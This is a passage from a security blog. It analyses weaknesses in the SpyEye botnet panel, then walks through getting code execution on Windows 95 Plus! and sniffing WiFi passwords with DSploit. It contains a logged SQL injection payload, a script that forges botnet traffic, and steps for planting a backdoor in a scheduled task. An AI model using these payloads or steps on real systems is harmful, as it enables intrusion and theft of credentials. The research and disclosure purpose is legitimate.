<pre class="prettyprint">63.217.168.90 - - [16/Jun/2014:04:43:00 -0500] "GET /form/frm_boa-grabber_sub.php?bot_guid=&lm=3&dt=%20where%201=2%20union%20select%20@a:=1%20from%20rep1%20where%20@a%20is%20null%20union%20select%20@a:=%20@a%20%2b1%20union%20select%20concat(id,char(1,3,3,7),bot_guid,char(1,3,3,7),process_name,char(1,3,3,7),hooked_func,char(1,3,3,7),url,char(1,3,3,7),func_data)%20from%20rep2_20140610%20where%20@a=3%23 HTTP/1.1" 200 508 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0C; .NET4.0E)"</pre>
</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
Although the query did not return any meaningful data to the attacker (only data collected from sandboxes), it raises some legal questions.<br />
<br /></div>
<div style="text-align: justify;">
Which company/organization has the right to attack my server? </div>
<div>
<ul>
<li style="text-align: justify;">police (having a warrant)</li>
<li style="text-align: justify;">military (if we are at war)</li>
<li style="text-align: justify;">spy agencies (always/never, choose your favorite answer)</li>
<li style="text-align: justify;">CERT organisations?</li>
</ul>
<div style="text-align: justify;">
<br />
But, does an AV company or security research company has the legal right to attack my server? I don't think so... The most problematic part is when they hack a server (without authorization), and sell the stolen information in the name of "intelligence service". What is it, the wild wild west?<br />
<br />
The SQLi clearly targets the content of the stolen login credentials. If this is not an AV company, but an attacker, how did they got the SpyEye dropper? If this is an AV company, why are they stealing the stolen credentials? Will they notify the internet banking owners about the stolen credentials for free? Or will they do this for money?<br />
<br />
And don't get me wrong, I don't want to protect the criminals, but this is clearly a grey area in the law. From an ethical point of view, I agree with hacking the criminal's servers. As you can see, the whole post is about disclosing vulns in these botnet panels. But from a legal point of view, this is something tricky ... I'm really interested in the opinion of others, so comments are warmly welcome.<br />
<br />
On a side note, I was interested how did the "attackers" found the SpyEye form directory? Easy, they brute-forced it, with a wordlist having ~43.000 entries.<br />
<br />
<h3>
(Useless) Cross site scripting</h3>
<div>
<br /></div>
Although parts of the SpyEye panel are vulnerable to XSS, it is unlikely that you will to find these components on the server, as these codes are part of the install process, and the installer fails to run if a valid install is found. And in this case, you also need the DB password to trigger the vuln...<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhUNjztjnpbcej-4S8tDBdWKR2E8BQnZw_eZZCnZ9Yz4rp7XzyGmLFDyn-D6HCX2ZVf47i5tMZnShZycZmCZgT5LRabyZXKHpSCt8xdyhV1YM9Ze_0xVKkINpSpGRBbd3cy3O7Vy3JtKs3t/s1600/xss_1.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="245" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhUNjztjnpbcej-4S8tDBdWKR2E8BQnZw_eZZCnZ9Yz4rp7XzyGmLFDyn-D6HCX2ZVf47i5tMZnShZycZmCZgT5LRabyZXKHpSCt8xdyhV1YM9Ze_0xVKkINpSpGRBbd3cy3O7Vy3JtKs3t/s1600/xss_1.png" width="400" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgkNY6pHhczucSLPimJZuXC2yf9jbkwux6elFSzv2Pvii-X_tkdsU_AYOjHsNpzSo1z62-2SW13m2N2wd2xqDnAs4ScyumVYnKGNioz2PXzYUSGr6JUFvA9rWtWKcZXWaXpZkHFtNTUUvAv/s1600/xss_2.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="172" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgkNY6pHhczucSLPimJZuXC2yf9jbkwux6elFSzv2Pvii-X_tkdsU_AYOjHsNpzSo1z62-2SW13m2N2wd2xqDnAs4ScyumVYnKGNioz2PXzYUSGr6JUFvA9rWtWKcZXWaXpZkHFtNTUUvAv/s1600/xss_2.png" width="400" /></a></div>
<br />
<h3>
Session handling</h3>
<div>
<br /></div>
This is a fun part. The logout button invalidates the session only on the server side, but not on the client side. But if you take into consideration that the login process never regenerates the session cookies (a.k.a session fixation), you can see that no matter how many times the admin logs into the application, the session cookie remains the same (until the admin does not close the browser). So if you find a session cookie which was valid in the past, but is not working at the moment, it is possible that this cookie will be valid in the future ...<br />
<br />
<h3>
Binary server</h3>
<div>
<br /></div>
Some parts of the SpyEye server involve running a binary server component on the server, to collect the form data. It would be interesting to fuzz this component (called sec) for vulns. <br />
<br />
<h3>
Log files revealed</h3>
<div>
<br /></div>
If the form panel mentioned in the SQLi part is installed on the server, it is worth visiting the <form_dir>/logs/error.log file, you might see the path of the webroot folder, IP addresses of the admins, etc.<br />
<br />
<h3>
Reading the code</h3>
<div>
<br /></div>
Sometimes reading the code you can find code snippets, which is hard to understand with a clear mind:
<br />
<br />
<pre class="prettyprint lang-php">$content = fread($fp, filesize($tmpName));
if ( $uptype === 'config' )
$md5 = GetCRC32($content);
else $md5 = md5($content);
....
<script>
if (navigator.userAgent.indexOf("Mozilla/4.0") != -1) {
alert("Your browser is not support yet. Please, use another (FireFox, Opera, Safari)");
document.getElementById("div_main").innerHTML = "<font class=\'error\'>ChAnGE YOuR BRoWsEr! Dont use BUGGED Microsoft products!</font>";
}
</script>
</pre>
<div>
<br />
<h3>
Decrypting SpyEye communication</h3>
</div>
<div>
It turned out that the communication between the malware and C&C server is not very sophisticated (Zeus does a better job at it, because the RC4 key stream is generated from the botnet password).</div>
<div>
<br /></div>
<div>
<div>
<pre class="prettyprint linenums lang-php">function DeCode($content)
{
$res = '';
for($i = 0; $i < strlen($content); $i++)
{
$num = ord($content[$i]);
if( $num != 219) $res .= chr($num^219);
}
return $res;
}
</pre>
</div>
</div>
</div>
Fixed XOR key, again, well done ...
<br />
<div>
This means that it is easy to create a script, which can communicate with the SpyEye server. For example this can be used to fill in the SpyEye database with crap data.</div>
<div>
<br /></div>
<div>
<br /></div>
<pre class="prettyprint linenums lang-python">import binascii
import requests
import httplib, urllib
def xor_str(a, b):
i = 0
xorred = ''
for i in range(len(a)):
xorred += chr(ord(a[i])^b)
return xorred
b64_data= "vK6yv+bt9er17O3r6vqPnoiPjZb2i5j6muvo6+rjmJ/9rb6p5urr6O/j/bK+5uP16/Xs7evq9ers7urv/bSo5u316vXs7evq/a6v5pq/trK1/bi4qbjm453j6uPv7Or9tr/u5um+uuvpve3p7eq/4+vsveLi7Lnqvrjr6ujs7rjt7rns/au3vOa5sre3srW8s7q2tr6p4Lm3tLiw4LmuvKm+q7Spr+C4uPu8qbq5ub6p4Li4vKm6ubm+qeC4qb6/sq+8qbq54LiuqK+0tri0tbW+uK+0qeC/v7So4L+1qLqrsuC+trqyt7ypurm5vqngvb24vqmvvKm6ubm+qeC9/aivuq/mtLW3srW+"
payload =xor_str (binascii.a2b_base64(b64_data), 219)
print ("the decrypted payload is: " + payload)
params = (binascii.b2a_base64(xor_str(payload,219)))
payload = {'data': params}
r = requests.post("http://spyeye.localhost/spyeye/_cg/gate.php", data=payload)
</pre>
<div>
<h3>
Morale of the story?</h3>
<div>
<br /></div>
Criminals produce the same shitty code as the rest of the world, and thanks to this, some of the malware operators get caught and are behind bars now. And the law is behind the reality, as always.</div>
<br /></div>
Zhttp://www.blogger.com/profile/12373001166765443215noreply@blogger.com1tag:blogger.com,1999:blog-7429675726481888518.post-3976836643175777412014-05-23T17:29:00.000+02:002014-05-23T21:45:05.735+02:00Hacking Windows 95, part 2<div style="text-align: justify;">
In the <a href="http://jumpespjump.blogspot.be/2014/02/hacking-windows-95-part-1.html" target="_blank">Hacking Windows 95, part 1</a> blog post, we covered that through a nasty bug affecting Windows 95/98/ME, the share password can be guessed in no time. In this article, I'm going to try to use this vulnerability to achieve remote code execution (with the help of publicly available tools only).<br />
<br />
The first thing we can do when we have read access to the Windows directory through the share, is to locate all the *.pwl files on the c:\windows directory, copy them to your machine where Cain is installed, switch to Cracker tab, pwl files, load the pwl file, add username based on the filename, and try to crack it. If you can't crack it you might still try to add a .pwl file where you already know the password in the remote windows directory. Although this is a fun post-exploitation task, but still, no remote code execution. These passwords are useless without physical access.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgYUEEyFeZeqVEnb8tMzn81QmJZTWC0xtCuNV7TNUS7hOaddyUlxJETGnaa8cBOZ0xUKh1HBL2WeP-jvU1r04gRN5eegNet7EHCkYOJegpPBVKu-94-2Dhuh95XNVYzOMJUJQWVlvTEzHpi/s1600/winxp_to_hack_win95-2014-05-08-16-59-10.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgYUEEyFeZeqVEnb8tMzn81QmJZTWC0xtCuNV7TNUS7hOaddyUlxJETGnaa8cBOZ0xUKh1HBL2WeP-jvU1r04gRN5eegNet7EHCkYOJegpPBVKu-94-2Dhuh95XNVYzOMJUJQWVlvTEzHpi/s1600/winxp_to_hack_win95-2014-05-08-16-59-10.png" height="270" width="400" /></a></div>
<br /></div>
<div style="text-align: justify;">
One might think that after having a share password and user password, it is easy to achieve remote code execution. The problem is:</div>
<ul>
<li style="text-align: justify;">there is no "at" command (available since Windows 95 plus!)</li>
<li style="text-align: justify;">there is no admin share</li>
<li style="text-align: justify;">there is no RPC</li>
<li style="text-align: justify;">there is no named pipes</li>
<li style="text-align: justify;">there is no remote registry</li>
<li style="text-align: justify;">there is no remote service management</li>
</ul>
<div style="text-align: justify;">
If you think about security best practices, disabling unnecessary services is always the first task you should do. Because Windows 95 lacks all of these services, it is pretty much secure!<br />
<br />
During my quest for a tool to hack Windows 95, I came across some pretty cool stuff:<br />
<div>
<br />
<b><a href="http://www.gregthatcher.com/InternetPeriscope/">Internet periscope</a></b><br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhlZwgBhcgI8QKLgzo4B5iqWavUcR_7FimVF2oQHqfZn0OrJ5b1U5ZqPNXLfe34E9QT85BN0tUFK_RQrvI1mSJ6BVZhIwT-zOlMRJerxEnrWyDQzbKD-QRGm3ifxLrdx_yEkOoJnTQlOU8j/s1600/winxp_to_hack_win95-2014-05-08-17-06-52.png" imageanchor="1"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhlZwgBhcgI8QKLgzo4B5iqWavUcR_7FimVF2oQHqfZn0OrJ5b1U5ZqPNXLfe34E9QT85BN0tUFK_RQrvI1mSJ6BVZhIwT-zOlMRJerxEnrWyDQzbKD-QRGm3ifxLrdx_yEkOoJnTQlOU8j/s1600/winxp_to_hack_win95-2014-05-08-17-06-52.png" height="178" width="320" /></a></div>
<b><br /></b>
</div>
<div>
<b><a href="http://sourceforge.net/projects/winfingerprint/">Winfingerprint</a></b><br />
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi6qwrCT1WRVmeWqdeuyNyOuArictr1thsdX0H-Io2_48ijsecPV1mBLFBc3wROh726bXJ234udNa_lmkb7mtAV_4fAzmKsBd3xkz-DYU_KylzU8nYBzikkMlBdOSBT1kioD_H7bxDIX1hW/s1600/winfingerprint.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi6qwrCT1WRVmeWqdeuyNyOuArictr1thsdX0H-Io2_48ijsecPV1mBLFBc3wROh726bXJ234udNa_lmkb7mtAV_4fAzmKsBd3xkz-DYU_KylzU8nYBzikkMlBdOSBT1kioD_H7bxDIX1hW/s1600/winfingerprint.png" height="304" width="320" /></a></div>
<br /></div>
<div>
<b><a href="http://lantricks.com/download/">LanSpy</a></b><br />
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjl48HANKhfGejo_6ORGwfJxMHNL1NDwg5L9AMgn8ae41_1d4cUw6-LjNDSTIujilg3bWME3aifmXg7-Pe5pRRydWtZ8d78oeU1SKQIRE6OF8IAuFcsV8fziCf-EGHwORlEtZ1Gk58Urz6G/s1600/lanspy.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjl48HANKhfGejo_6ORGwfJxMHNL1NDwg5L9AMgn8ae41_1d4cUw6-LjNDSTIujilg3bWME3aifmXg7-Pe5pRRydWtZ8d78oeU1SKQIRE6OF8IAuFcsV8fziCf-EGHwORlEtZ1Gk58Urz6G/s1600/lanspy.png" height="320" width="290" /></a></div>
<br />
But the best of the best is <b><a href="http://download.csdn.net/detail/zheng127/4552709">Fluxay</a></b>, which has been written by chinese hackers. It is the metasploit from the year 2000. A screenshot is worth more than a 1000 words. 4 screenshot > 4 thousand words :)<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh9O9yy0ISY4x0u3ZiyDVDlAVtREc9mZywFNVOIWcM-QIZHG1HskUpx2tYUKHebcywCTuM1iUJvxbeAH2-g55SiCCDpFUeNP1uvde2EbvC6K5MFvtbjDQl1o6epjukJoN9tqrKwu1nwGffq/s1600/fluxay1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh9O9yy0ISY4x0u3ZiyDVDlAVtREc9mZywFNVOIWcM-QIZHG1HskUpx2tYUKHebcywCTuM1iUJvxbeAH2-g55SiCCDpFUeNP1uvde2EbvC6K5MFvtbjDQl1o6epjukJoN9tqrKwu1nwGffq/s1600/fluxay1.png" height="240" width="320" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjkTuaqKyhIW2wghg2U58tfQcIueqxwDkXrm0_R19lOAUuSfKUag_JA1XOHC9tMN3LUVvR38qGz_Mv3I3weV1QUpY7IRsYG9MxkeFSS_-FWrrCU1I1Lvk0FdqKTafic5PGYc6Od4EK7f3cR/s1600/fluxay2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjkTuaqKyhIW2wghg2U58tfQcIueqxwDkXrm0_R19lOAUuSfKUag_JA1XOHC9tMN3LUVvR38qGz_Mv3I3weV1QUpY7IRsYG9MxkeFSS_-FWrrCU1I1Lvk0FdqKTafic5PGYc6Od4EK7f3cR/s1600/fluxay2.png" height="277" width="320" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhCEPVODyj023wblynEns-GLbiP1Op743_-C_1bwiEUV-cy12zdwveWcT3uJs7vYBU6SqHszjozhbRkMKOYd6lR3cHDdXu35O0rc2e7i0zTOE-XL8YjTIXZucmt9WVI7AuR4FPW4FMNg1ca/s1600/fluxay3.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhCEPVODyj023wblynEns-GLbiP1Op743_-C_1bwiEUV-cy12zdwveWcT3uJs7vYBU6SqHszjozhbRkMKOYd6lR3cHDdXu35O0rc2e7i0zTOE-XL8YjTIXZucmt9WVI7AuR4FPW4FMNg1ca/s1600/fluxay3.png" height="279" width="320" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjo_rueXHfO27F-xw9gW8D3_4J-osVH9W_458mbugseaJGf3XfnHREwq2ACZPFkSU3SBJHS_WgY2kQ3jdiXpO0XTKrLXUCicLI5iX6jxqde_YKcixbh3btys5VAbLXBffvgtH5edQeQr708/s1600/fluxay4.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjo_rueXHfO27F-xw9gW8D3_4J-osVH9W_458mbugseaJGf3XfnHREwq2ACZPFkSU3SBJHS_WgY2kQ3jdiXpO0XTKrLXUCicLI5iX6jxqde_YKcixbh3btys5VAbLXBffvgtH5edQeQr708/s1600/fluxay4.png" height="282" width="320" /></a></div>
<br /></div>
<div>
It is pretty hard to find the installer, but it is still out there!<br />
<br />
But at the end, no remote code execution for me.</div>
</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
My idea here was that if I can find a file which executes regularly (on a scheduled basis), I can change that executable to my backdoor and I'm done. Although there is no scheduler in the default Windows 95, I gave it a try. </div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
Let's fire up taskman.exe to get an idea what processes are running:<br />
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjpmD7IzX_fN3YmNVHSOKpzll-tvY8PvLJEvOxHv03J4i8KMyZK0rQxu-Ye8ZrO9LfO4yBkHzI_lTaTnnzwaNOt8qCQt_g9zZTdZTSUCVS20OTuTtbKyC3iNH-P1pK29E_JMkRmkC_k9URh/s1600/Windows+95-2014-01-07-21-18-47.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjpmD7IzX_fN3YmNVHSOKpzll-tvY8PvLJEvOxHv03J4i8KMyZK0rQxu-Ye8ZrO9LfO4yBkHzI_lTaTnnzwaNOt8qCQt_g9zZTdZTSUCVS20OTuTtbKyC3iNH-P1pK29E_JMkRmkC_k9URh/s1600/Windows+95-2014-01-07-21-18-47.png" height="300" width="400" /></a></div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
Looks like we need a more powerful tool here, namely Process Explorer. Let's try to download this from oldapps.com:<br />
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgScOxM0T1emj11AETmIBkeqg8BXIpTT8j5JNfsnfaVkWAktn81wxZeM7tbLeSt7T7bd6T9kJDjNxxQQi3FXUfpehzDkob_LM2z59PFMAn19XNsvLjTfa_kFZnkGu4VGH4wwrXcUsetxEOd/s1600/Windows+95-2014-02-02-12-12-30.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgScOxM0T1emj11AETmIBkeqg8BXIpTT8j5JNfsnfaVkWAktn81wxZeM7tbLeSt7T7bd6T9kJDjNxxQQi3FXUfpehzDkob_LM2z59PFMAn19XNsvLjTfa_kFZnkGu4VGH4wwrXcUsetxEOd/s1600/Windows+95-2014-02-02-12-12-30.png" height="300" width="400" /></a></div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
LOL, IE3 hangs, can't render the page. Copying files to the Win95 VM is not that simple, because there are no shared folders in Win95 VM. And you can't use pendrives either, Win95 can't handle USB (at least the retail version). After downloading the application with a newer browser from oldapps, let's start Process Explorer on the test Windows 95.<br />
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEilyY50KN2VIG_qwqT_rBw2XgM8XQYVLE41GZVxXsF3XYy2qQLM8qt72qXdHWLe6-QOjMuZl2uIKyQS1H2-6kEAwrWOkjPvMB7hjyRw9EYGwAfG5U-SxnFLOg0tKjQyW_rK2DtjYpYd53VY/s1600/Windows+95-2014-01-07-21-32-15.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEilyY50KN2VIG_qwqT_rBw2XgM8XQYVLE41GZVxXsF3XYy2qQLM8qt72qXdHWLe6-QOjMuZl2uIKyQS1H2-6kEAwrWOkjPvMB7hjyRw9EYGwAfG5U-SxnFLOg0tKjQyW_rK2DtjYpYd53VY/s1600/Windows+95-2014-01-07-21-32-15.png" height="300" width="400" /></a></div>
<div style="text-align: justify;">
<br />
Don't try to download the Winsocks 2 patch from the official MS site, it is not there anymore, but you can download it from <a href="ftp://ftp.ema.fr/pub/pc/windows/securite/">other sites</a>. </div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
Now let's look at the processes running:<br />
<div class="separator" style="clear: both; text-align: center;">
</div>
<br />
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiiwJ3eNXx-MMCwzF2h2fn_o4h-b7u5-HbdNbwUKugV3HJiGDTG1ZExjx7N9GhRBlPImlOeKs3RC9wuYne06VssWoVjj8gEtCoDWrMrei0GO1KIi5lRnQOGgtO30gBqQd-qeK7_ZOniqbez/s1600/procexp_running.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiiwJ3eNXx-MMCwzF2h2fn_o4h-b7u5-HbdNbwUKugV3HJiGDTG1ZExjx7N9GhRBlPImlOeKs3RC9wuYne06VssWoVjj8gEtCoDWrMrei0GO1KIi5lRnQOGgtO30gBqQd-qeK7_ZOniqbez/s1600/procexp_running.png" height="300" width="400" /></a></div>
<br />
After staring it for minutes, turned out it is constant, no new processes appeared.<br />
Looking at the next screenshot, one can notice this OS was not running a lot of background processes ...<br />
<br /></div>
<div style="text-align: justify;">
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhbq2kweWdG0tvnMCw_bGHA3gqX_u9Z8NGOeuMQXjNVGLPE2L_i3Z72Y699KpWk-HFV3aGhJyTJ-T4w3kmCm6_OTw1q63mF-ehRIr9QUacwKPdj_i02r9l3FGdY63jz5ah_JDCgrgvX0r91/s1600/procexp2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhbq2kweWdG0tvnMCw_bGHA3gqX_u9Z8NGOeuMQXjNVGLPE2L_i3Z72Y699KpWk-HFV3aGhJyTJ-T4w3kmCm6_OTw1q63mF-ehRIr9QUacwKPdj_i02r9l3FGdY63jz5ah_JDCgrgvX0r91/s1600/procexp2.png" height="297" width="400" /></a></div>
<br /></div>
<div style="text-align: justify;">
My current Win7 has 1181 threads and 84 processes running, no wonder it is slow as hell :)<br />
<br /></div>
<div style="text-align: justify;">
We have at least the following options:</div>
<ol>
<li style="text-align: justify;">You are lucky and not the plain Windows 95 is installed, but Windows 95 Plus! The main difference here is that Windows 95 Plus! has built-in scheduler, especially the "at" command. Just overwrite a file which is scheduled to execution, and wait. Mission accomplished!</li>
<li style="text-align: justify;">Ping of death - you can crash the machine (no BSOD, just crash) with long (over 65535 bytes) ICMP ping commands, and wait for someone to reboot it. Just don't forget to put your backdoor on the share and add it to autoexec.bat before crashing it. </li>
<li style="text-align: justify;">If your target is a plain Windows 95, I believe you are out of luck. No at command, no named pipes, no admin share, nothing. Meybe you can try to fuzz port 137 138 139, and write an exploit for those. Might be even Ping of Death is exploitable?</li>
</ol>
<div style="text-align: justify;">
Let's do the first option, and hack Windows 95 plus!</div>
<div style="text-align: justify;">
Look at the cool features we have by installing Win95 Plus!<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjqw7Sk-Yt2dT1ucN-l67yKJMXoqQaWncxS4uy_wEHeOr2TU6qF8c5MowfxF0HxMPariMzUZ6KEYcVEAMDJ0-m1RQLm1ekEtbcJJA7BWhoAIbzOl2D1DrXJzy1WggCDmjMb4TKdxPDTuAA1/s1600/win95plus_features.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjqw7Sk-Yt2dT1ucN-l67yKJMXoqQaWncxS4uy_wEHeOr2TU6qF8c5MowfxF0HxMPariMzUZ6KEYcVEAMDJ0-m1RQLm1ekEtbcJJA7BWhoAIbzOl2D1DrXJzy1WggCDmjMb4TKdxPDTuAA1/s1600/win95plus_features.png" height="240" width="320" /></a></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
Cool new boot splash screen!</div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgxkJSTvISyHK8XejQomkxaqKxvZCLwn6zYjnlDSvyil5lOsR6gt3K5H3R2Ua225ZRGoE7TObvEGOHSjraDaLMfPZWOT7j-wu53j6k7QjgfccABXRQeiIIZ3j9GM8QHns8M9Pystec76Vyo/s1600/win95_plus_boot.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgxkJSTvISyHK8XejQomkxaqKxvZCLwn6zYjnlDSvyil5lOsR6gt3K5H3R2Ua225ZRGoE7TObvEGOHSjraDaLMfPZWOT7j-wu53j6k7QjgfccABXRQeiIIZ3j9GM8QHns8M9Pystec76Vyo/s1600/win95_plus_boot.png" height="200" width="320" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
But our main interest is the new, scheduled tasks!</div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgROp-GmoOPrpQqjQZCHTLjIibLadlCV_JANJdqbaqtcevEUuZF2FvymmvAvOegFZbwpb1xD0mlW6VMLpgkr9Vt8zjLPjaQFtbbjhCeBKLfB9WEyLCn9CtagRI5MrI5b1oS3ZlaOmdn6CTT/s1600/win95_scheduled_tasks.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgROp-GmoOPrpQqjQZCHTLjIibLadlCV_JANJdqbaqtcevEUuZF2FvymmvAvOegFZbwpb1xD0mlW6VMLpgkr9Vt8zjLPjaQFtbbjhCeBKLfB9WEyLCn9CtagRI5MrI5b1oS3ZlaOmdn6CTT/s1600/win95_scheduled_tasks.png" height="240" width="320" /></a></div>
<br />
Now we can replace diskalm.exe with our backdoor executable, and wait maximum one hour to be scheduled.<br />
<br />
Instead of a boring text based tutorial, I created a YouTube video for you. Based on the feedbacks on my previous tutorialz, it turned out I'm way too old, and can't do interesting tutorials. That's why I analyzed the cool skiddie videoz, and found that I have to do the followings so my vidz won't suck anymore:<br />
<ul>
<li>use cool black windows theme</li>
<li>put meaningless performance monitor gadgets on the sidebar</li>
<li>use a cool background, something related with hacking and skullz</li>
<li>do as many opsec fails as possible</li>
<li>instead of captions, use notepad with spelling errorz</li>
<li>there is only one rule of metal: <a href="http://www.youtube.com/watch?v=Hreqn9j3PHI">Play it fuckin' loud!!!!</a></li>
</ul>
<div style="text-align: center;">
<iframe allowfullscreen="" frameborder="0" height="480" src="//www.youtube-nocookie.com/embed/x5Yt5UjLR1w?rel=0" width="640"></iframe>
</div>
</div>
Zhttp://www.blogger.com/profile/12373001166765443215noreply@blogger.com2tag:blogger.com,1999:blog-7429675726481888518.post-14260577507214285812014-04-29T23:56:00.003+02:002019-10-08T15:55:47.488+02:00DSploit<div style="text-align: justify;">
<h3 style="text-align: justify;">
DSploit</h3>
</div>
<div style="text-align: justify;">
<div style="text-align: justify;">
After playing with the applications installed on the <a href="http://jumpespjump.blogspot.com/2014/04/wifi-hacking-on-tablets.html">Pwn Pad</a>, I found that the most important application (at least for me) was missing from the pre-installed apps. Namely, <a href="http://dsploit.net/">DSploit</a>. Although DSploit has tons of features, I really liked the multiprotocol password sniffing (same as dsniff) and the session hijacking functionality.</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
The DSploit APK in the Play Store was not working for me, but the latest nightly on http://dsploit.net worked like a charm.</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
Most features require that you and your target uses the same WiFi network, and that's it. It can be Open, WEP, WPA/WPA2 Personal. On all of these networks, DSploit will sniff the passwords - because of the <a href="http://dsploit.net/2013/03/22/dsploit-internals-and-arp-cache-poisoning/">active attacks</a>. E.g. a lot of email clients still use IMAP with clear text passwords, or some webmails, etc. </div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
First, DSploit lists the AP and the known devices on the network. In this case, I chose one victim client.</div>
<div style="text-align: justify;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
